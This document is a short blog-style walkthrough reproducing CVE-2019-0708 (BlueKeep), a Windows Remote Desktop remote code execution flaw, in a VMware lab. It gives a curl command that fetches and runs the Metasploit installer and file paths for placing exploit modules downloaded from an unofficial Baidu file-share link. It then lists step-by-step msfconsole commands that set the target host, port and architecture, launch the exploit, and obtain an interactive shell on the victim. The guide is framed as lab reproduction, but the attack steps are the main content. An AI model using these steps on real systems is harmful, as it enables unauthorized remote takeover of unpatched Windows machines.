CVE-2019-0708 Remote Desktop Code Execution Vulnerability Reproduction

Vulnerability environment

Use VMware to install a Windows 7 SP1 machine to simulate the victim

 

 

Exploitation

Preparing the attack tools

  • 1. Use the following command to install and update the Metasploit framework in one step
  • curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

     

  • 2. Download the files from the reference link and place them in the corresponding MSF folders (if a file already exists, it can be overwritten directly)
  • rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

 

 

Attack commands

Use msfconsole to enter the Metasploit framework

After entering, use reload_all to reload the 0708 RDP modules

Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce to enable the 0708 RDP attack module

Use info to view the tool's information and settings

The key settings are RHOSTS, RPORT and target

Use set RHOSTS <victim machine IP> to set the victim machine's IP

Use set RPORT <victim machine port> to set the victim machine's RDP port number

Use set target <ID number> (optional, 0-4) to set the victim machine's architecture

Here we are using VMware, so target 2 satisfies the condition

Use exploit to begin the attack and wait for the connection to be established. After the connection is established, use the obtained shell, then get an interactive shell to complete the attack; permissions on the victim host have been successfully obtained

 

 

Reference

Link: https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg  extraction code: ml9g

 


Origin www.cnblogs.com/xyongsec/p/11491528.html